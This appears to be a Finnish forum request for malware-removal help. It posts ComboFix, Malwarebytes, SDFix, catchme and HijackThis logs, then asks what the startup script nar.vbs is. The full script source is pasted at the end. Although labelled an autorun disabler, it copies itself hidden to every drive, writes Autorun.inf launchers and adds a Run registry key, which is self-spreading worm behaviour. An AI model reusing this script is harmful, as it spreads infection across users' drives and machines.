2004-09-15 15:00 13312 39726087f99c7775b2ea1f2990709817 C:\WINDOWS\$NtServicePackUninstall$\lsass.exe
2008-04-14 19:12 13312 abe0d5760dafd55390057378cda68bd8 C:\WINDOWS\ServicePackFiles\i386\lsass.exe
2008-04-14 19:12 13312 abe0d5760dafd55390057378cda68bd8 C:\WINDOWS\system32\lsass.exe

2004-09-15 15:00 15360 e8e7ce0d379630e7b0015e48fa90499b C:\WINDOWS\$NtServicePackUninstall$\ctfmon.exe
2008-04-14 19:12 15360 b067064d68be516f1b5417a086f0bfe9 C:\WINDOWS\ServicePackFiles\i386\ctfmon.exe
2008-04-14 19:12 15360 b067064d68be516f1b5417a086f0bfe9 C:\WINDOWS\system32\ctfmon.exe

2005-06-11 03:17 57856 ad3d9d191aea7b5445fe1d82ffbb4788 C:\WINDOWS\$hf_mig$\KB896423\SP2QFE\spoolsv.exe
2005-06-11 02:53 57856 da81ec57acd4cdc3d4c51cf3d409af9f C:\WINDOWS\$NtServicePackUninstall$\spoolsv.exe
2004-09-15 15:00 57856 977db6827ad7c3eaa1f9e83a22483611 C:\WINDOWS\$NtUninstallKB896423$\spoolsv.exe
2008-04-14 19:12 57856 6f9ff25dd729a9cae870e4beea764547 C:\WINDOWS\ServicePackFiles\i386\spoolsv.exe
2008-04-14 19:12 57856 6f9ff25dd729a9cae870e4beea764547 C:\WINDOWS\system32\spoolsv.exe

2004-09-15 15:00 24576 6484e1ecd8be4011d74fe68a761798fd C:\WINDOWS\$NtServicePackUninstall$\userinit.exe
2008-04-14 19:12 26112 3a5773b946c1b4f0db1b48a5d8e1d562 C:\WINDOWS\ServicePackFiles\i386\userinit.exe
2008-04-14 19:12 26112 3a5773b946c1b4f0db1b48a5d8e1d562 C:\WINDOWS\system32\userinit.exe
.
(((((((((((((((((((((((((((((( Rekisterin käynnistyskohteet )))))))))))))))))))))))))))))))))))))))))))))
.
.
*Huom* Tyhjiä arvoja ja laillisia oletusarvoja ei näytetä
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2008-04-14 19:12 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IntelliPoint"="C:\Program Files\Microsoft IntelliPoint\point32.exe" [2003-05-16 02:41 163840]
"type32"="C:\Program Files\Microsoft IntelliType Pro\type32.exe" [2003-05-16 02:45 114688]
"SmcService"="C:\PROGRA~1\Sygate\smc.exe" [2004-10-15 19:40 2577632]
"nar"="C:\WINDOWS\nar.vbs" [2008-05-19 22:18 7474]
"BluetoothAuthenticationAgent"="bthprops.cpl" [2008-04-14 19:12 110592 C:\WINDOWS\system32\bthprops.cpl]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\CTFMON.EXE" [2008-04-14 19:12 15360]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoDesktopCleanupWizard"= 1 (0x1)
"MaxRecentDocs"= 15 (0xf)

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"msacm.avis"= ff_acm.acm

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^Adobe Reader Speed Launch.lnk]
backup=C:\WINDOWS\pss\Adobe Reader Speed Launch.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^BTTray.lnk]
backup=C:\WINDOWS\pss\BTTray.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^hp psc 1000 series.lnk]
backup=C:\WINDOWS\pss\hp psc 1000 series.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^hpoddt01.exe.lnk]
backup=C:\WINDOWS\pss\hpoddt01.exe.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Käynnistä-valikko^Ohjelmat^Käynnistys^Microsoft Office.lnk]
backup=C:\WINDOWS\pss\Microsoft Office.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^Omistaja^Käynnistä-valikko^Ohjelmat^Käynnistys^Adobe Gamma.lnk]
backup=C:\WINDOWS\pss\Adobe Gamma.lnkStartup

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ATICCC]
--a------ 2006-01-02 18:41 45056 C:\Program Files\ATI Technologies\ATI.ACE\CLI.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
--a------ 2008-04-14 19:12 15360 C:\WINDOWS\system32\ctfmon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools-1033]
--a------ 2004-08-22 17:05 81920 D:\Ohjelmat\Daemon Tools\daemon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NeroFilterCheck]
--a------ 2001-07-09 11:50 155648 C:\WINDOWS\system32\NeroCheck.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
--a------ 2005-11-10 14:03 36975 D:\Ohjelmat\java\bin\jusched.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BluetoothAuthenticationAgent]
--a------ 2008-04-14 19:12 110592 C:\WINDOWS\system32\bthprops.cpl

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SoundMan]
--a------ 2005-04-15 11:01 77824 C:\WINDOWS\SOUNDMAN.EXE

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run-]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe
"SMSystemAnalyzer"="D:\Ohjelmat\System Mechanic Professional 6\SMSystemAnalyzer.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"BluetoothAuthenticationAgent"=rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
"RemoteControl"="C:\Program Files\CyberLink DVD Solution\PowerDVD\PDVDServ.exe"
"NeroFilterCheck"=C:\WINDOWS\system32\NeroCheck.exe
"LGODDFU"="C:\Program Files\lg_fwupdate\fwupdate.exe"
"ioloDelayModule"=D:\Ohjelmat\System Mechanic Professional 6\delay.exe

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\utorrent\\utorrent.exe"=
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"D:\\Ohjelmat\\revconnect1\\RevConnect\\DCPlusPlus.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=

R1 aswSP;avast! Self Protection;C:\WINDOWS\system32\drivers\aswSP.sys [2008-05-16 02:20]
R1 atitray;atitray;C:\Program Files\Radeon Omega Drivers\v3.8.231\ATI Tray Tools\atitray.sys [2006-01-24 21:32]
R2 aswFsBlk;aswFsBlk;C:\WINDOWS\system32\DRIVERS\aswFsBlk.sys [2008-05-16 02:16]
R2 NwSapAgent;SAP-agentti;C:\WINDOWS\system32\svchost.exe [2008-04-14 19:12]
R3 CnxTgN;Conexant AccessRunner PCI ADSL LAN Adapter Driver;C:\WINDOWS\system32\DRIVERS\CnxTgN.sys [2003-05-12 14:02]
R3 CnxTgP;Conexant AccessRunner PCI ADSL LAN Adapter Filter Driver;C:\WINDOWS\system32\DRIVERS\CnxTgP.sys [2003-05-12 13:56]
R3 CnxTgR;Conexant AccessRunner PCI ADSL Interface Device Driver;C:\WINDOWS\system32\DRIVERS\CnxTgR.sys [2003-05-12 13:54]
R3 FET5X86V;VIA Rhine-Family Fast-Ethernet Adapter Driver Service;C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys [2006-12-20 08:00]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{6b33b354-c27d-11db-beb0-000ea131a418}]
\Shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe nar.vbs

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{6d4f6339-4027-11dc-bf86-00e0955017d8}]
\Shell\AutoRun\command - F:\InstallTomTomHOME.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a1984d2d-1616-11dd-80ac-00e0955017d8}]
\Shell\AutoRun\command - F:\InstallTomTomHOME.exe
.
'Ajoitetut tehtävät'-kansion sisältö

2008-08-16 C:\WINDOWS\Tasks\FRU Task #Hewlett-Packard#hp psc 1100 series#1123313046.job
- C:\Program Files\Hewlett-Packard\Digital Imaging\Bin\hpqfrucl.exe [2003-04-06 00:52]
.
.
------- Supplementary Scan -------
.
FireFox -: Profile - C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\
FireFox -: prefs.js - STARTUP.HOMEPAGE - hxxp://www.google.fi/
FF -: plugin - C:\Program Files\Mozilla Firefox\plugins\npmozax.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava11.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava12.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava13.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava14.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJava32.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPJPI150_06.dll
FF -: plugin - D:\Ohjelmat\java\bin\NPOJI610.dll
FF -: plugin - D:\Ohjelmat\Real Alternative\browser\plugins\nppl3260.dll
FF -: plugin - D:\Ohjelmat\Real Alternative\browser\plugins\nprpjplug.dll
FF -: plugin - D:\Ohjelmat\VLC\npvlc.dll
.
.
------- File Associations (Beta) -------
.
JSEFile=NOTEPAD.EXE %1
VBEFile=NOTEPAD.EXE %1
VBSFile=NOTEPAD.EXE %1
.

**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-08-28 13:45:26
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\system\ControlSet001\Services\vsdatant]
"ImagePath"=""
.
Completion time: 2008-08-28 13:49:17
ComboFix-quarantined-files.txt 2008-08-28 10:49:11

Pre-Run: 221,605,888 tavua vapaana
Post-Run: 249,815,040 tavua vapaana

296 --- E O F --- 2008-08-28 10:17:29

 

Malwarebytes' Anti-Malware 1.18
Tietokantaversio: 883

14:22:47 28.8.2008
mbam-log-8-28-2008 (14-22-47).txt

Tarkistustyyppi: Täysi tarkistus (C:\|D:\|)
Tarkistetut kohteet: 96965
Kulunut aika: 31 minute(s), 46 second(s)

Saastuneita muistiprosesseja: 0
Saastuneita muistimoduuleja: 0
Saastuneita rekisteriavaimia: 0
Saastuneita rekisteriarvoja: 0
Saastuneita rekisterikohteita: 0
Saastuneita hakemistoja: 0
Saastuneita tiedostoja: 0

Saastuneita muistiprosesseja:
(Haitallisia kohteita ei löydetty)

Saastuneita muistimoduuleja:
(Haitallisia kohteita ei löydetty)

Saastuneita rekisteriavaimia:
(Haitallisia kohteita ei löydetty)

Saastuneita rekisteriarvoja:
(Haitallisia kohteita ei löydetty)

Saastuneita rekisterikohteita:
(Haitallisia kohteita ei löydetty)

Saastuneita hakemistoja:
(Haitallisia kohteita ei löydetty)

Saastuneita tiedostoja:
(Haitallisia kohteita ei löydetty)

 

SDFix: Version 1.219
Run by Omistaja on to 28.08.2008 at 14:29

Microsoft Windows XP [versio 5.1.2600]
Running From: C:\Documents and Settings\Omistaja\Ty”p”yt„\SDFix

Checking Services :


Restoring Default Security Values
Restoring Default Hosts File

Rebooting


Checking Files :

No Trojan Files Found




Folder C:\Documents and Settings\Omistaja\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#w*w.redtube.com - Removed


Removing Temp Files

ADS Check :



Final Check :

catchme 0.3.1361.2 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-08-28 14:37:01
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden services & system hive ...

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BTHPORT\Parameters\Keys\000ea131a418]
"00124719159a"=hex:2f,a4,f0,96,83,fc,c2,10,6b,07,02,69,96,31,6b,2c
"0012eec0955e"=hex:83,04,5e,b3,cd,1f,32,49,f9,67,9f,f2,84,3e,9f,07
"001e3b3d6a77"=hex:ff,d0,59,ec,94,af,70,20,2b,8c,ae,6c,30,5a,62,9d
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\d347prt\Cfg\0Jf40]
"khjeh"=hex:20,02,00,00,81,e1,69,63,a7,ce,40,53,51,a2,f3,1f,71,17,a8,03,e9,..
"hj34z0"=hex:d9,e3,62,e3,fe,ff,e5,6b,64,5a,bf,77,7d,f5,13,6d,23,2f,2f,57,62,..
"hj34z1"=hex:57,e3,62,e3,86,ff,e5,6b,65,5a,be,77,7c,f5,13,6d,23,2f,2f,57,62,..
"hj34z2"=hex:57,e3,62,e3,86,ff,e5,6b,65,5a,be,77,7c,f5,13,6d,23,2f,2f,57,62,..
"hj34z3"=hex:57,e3,62,e3,86,ff,e5,6b,65,5a,be,77,7c,f5,13,6d,23,2f,2f,57,62,..
"hj34z4"=hex:57,e3,62,e3,86,ff,e5,6b,65,5a,be,77,7c,f5,13,6d,23,2f,2f,57,62,..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\d347prt\Cfg\0Jf41]
"khjeh"=hex:20,02,00,00,b1,e1,69,63,14,09,53,39,e1,1d,c8,87,17,20,b0,bc,39,..
"hj34z0"=hex:53,f7,f1,87,5e,41,de,f3,54,7c,a7,c8,ad,d9,fe,af,93,1b,b2,7f,8f,..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\d347prt\Cfg\0Jf42]
"khjeh"=hex:20,02,00,00,fc,73,78,c6,69,f3,94,5c,2c,a4,54,e8,06,11,03,78,3b,..
"hj34z0"=hex:3e,0f,57,60,93,f8,42,9c,5b,4d,14,0c,a8,e5,28,c3,70,50,6c,12,93,..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\d347prt\Cfg\0Jf43]
"khjeh"=hex:20,02,00,00,fc,73,78,c6,50,26,75,b7,2c,a4,54,e8,06,11,03,78,3b,..
"hj34z0"=hex:3e,0f,57,60,93,f8,42,9c,5b,4d,14,0c,a8,e5,28,c3,70,50,6c,12,3e,..
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\BTHPORT\Parameters\Keys\000ea131a418]
"00124719159a"=hex:2f,a4,f0,96,83,fc,c2,10,6b,07,02,69,96,31,6b,2c
"0012eec0955e"=hex:83,04,5e,b3,cd,1f,32,49,f9,67,9f,f2,84,3e,9f,07
"001e3b3d6a77"=hex:ff,d0,59,ec,94,af,70,20,2b,8c,ae,6c,30,5a,62,9d

scanning hidden registry entries ...

scanning hidden files ...

scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 0


Remaining Services :




Authorized Application Key Export:

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabledxpsp2res.dll,-22019"
"C:\\Program Files\\utorrent\\utorrent.exe"="C:\\Program Files\\utorrent\\utorrent.exe:*:Enabled:æTorrent"
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"="C:\\Program Files\\Mozilla Firefox\\firefox.exe:*:Enabled:Firefox"
"%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabledxpsp3res.dll,-20000"
"D:\\Ohjelmat\\revconnect1\\RevConnect\\DCPlusPlus.exe"="D:\\Ohjelmat\\revconnect1\\RevConnect\\DCPlusPlus.exe:*:EnabledC++"
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"="C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"="C:\\Program Files\\Windows Live\\Messenger\\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabledxpsp2res.dll,-22019"
"%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabledxpsp3res.dll,-20000"
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"="C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"="C:\\Program Files\\Windows Live\\Messenger\\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"

Remaining Files :



Files with Hidden Attributes :

Thu 8 May 2008 0 A..H. --- "C:\WINDOWS\SoftwareDistribution\Download\e2cdfda265544b05233b12ad6d933aba\BIT1.tmp"

Finished!

 

Logfile of HijackThis v1.99.1
Scan saved at 14:47:40, on 28.8.2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16705)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Sygate\smc.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Avast4\aswUpdSv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
D:\BlueTooth\bin\btwdins.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\Microsoft IntelliType Pro\type32.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\HiJackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Linkit
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - D:\Ohjelmat\java\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Liven kirjautumisapuohjelma - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [IntelliPoint] "C:\Program Files\Microsoft IntelliPoint\point32.exe"
O4 - HKLM\..\Run: [type32] "C:\Program Files\Microsoft IntelliType Pro\type32.exe"
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\smc.exe -startgui
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [nar] C:\WINDOWS\nar.vbs
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Lähetä &Bluetooth-laitteeseen - D:\BlueTooth\btsendto_ie_ctx.htm
O8 - Extra context menu item: Open Link Target in Firefox - file://C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\extensions\{5D558C43-550F-4b12-84AB-0D8ABDA9F975}\firefoxviewlink.html
O8 - Extra context menu item: View This Page in Firefox - file://C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\extensions\{5D558C43-550F-4b12-84AB-0D8ABDA9F975}\firefoxviewpage.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Ohjelmat\java\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Ohjelmat\java\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - D:\BlueTooth\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-4017 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - D:\BlueTooth\btsendto_ie.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab31267.cab
O16 - DPF: {14B87622-7E19-4EA8-93B3-97215F77A6BC} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab31267.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab31267.cab
O16 - DPF: {3B36B017-7E49-426B-95B0-B5CECD83C2E2} (IfolorUploader Control) - http://fika-web.ifolor.net/OrderingGeneral/LowRes/app_support/ActiveX/IfolorUploader_fika.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/msnmessengersetupdownloader.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://messenger.zone.msn.com/binary/ZIntro.cab32846.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O16 - DPF: {F6BF0D00-0B2A-4A75-BF7B-F385591623AF} (Solitaire Showdown Class) - http://messenger.zone.msn.com/binary/SolitaireShowdown.cab31267.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: widimg - {EE7C2AFF-5742-44FF-BD0E-E521B0D3C3BA} - C:\WINDOWS\system32\btxppanel.dll
O20 - Winlogon Notify: dimsntfy - %SystemRoot%\System32\dimsntfy.dll (file missing)
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Avast4\aswUpdSv.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation - D:\BlueTooth\bin\btwdins.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\smc.exe

 

Vielä sellaista kysyisin että mikähän on Nar.vbs? Se lykkää joka käynnistyksen yhteydes tämmösen ruudulle:

'--------------------------------------------------------------->
'---Disables Autorun to prevent the spread of malicious code.--->
'---v0.1-------------------------------------------------------->
'--------------------------------------------------------------->
on error resume next

dim narsource,nar_RunDir,windir,disk_Drive,fso,mf,autorun,to_File,text,shell,in_WinDir,wsh_Path

set fso = CreateObject("Scripting.FileSystemObject")
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)


'---Open the drive just like autorun would if it is not running from the windows directory--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
shell.run(windir & "\explorer.exe /root," & nar_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If

'---If file is in windir and not running from windir then write the registry run value and exit--->
If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then

autorun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe nar.vbs"
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop


If (in_WinDir = 0) Then
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 32
set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 39
End If

do while (in_WinDir = 1)
'---Add nar and autorun to each local disk drive excluding floppies--->
for each disk_Drive in fso.drives
If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then

set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 39

set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\Autorun.inf",2,true)
to_File.write autorun
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 39
End If
next

'---Edit the registry to disable autorun--->
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
shell.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun",0,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun",255,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"

'---Run once every 5 minutes while within the Windows directory--->
wscript.sleep(60000)
loop

'---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
temp = windir&"\nar.vbs"
shell.run temp,1,0
End If
End If
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"

 

scannaa hjt:llä merkkaa paina Fix checked

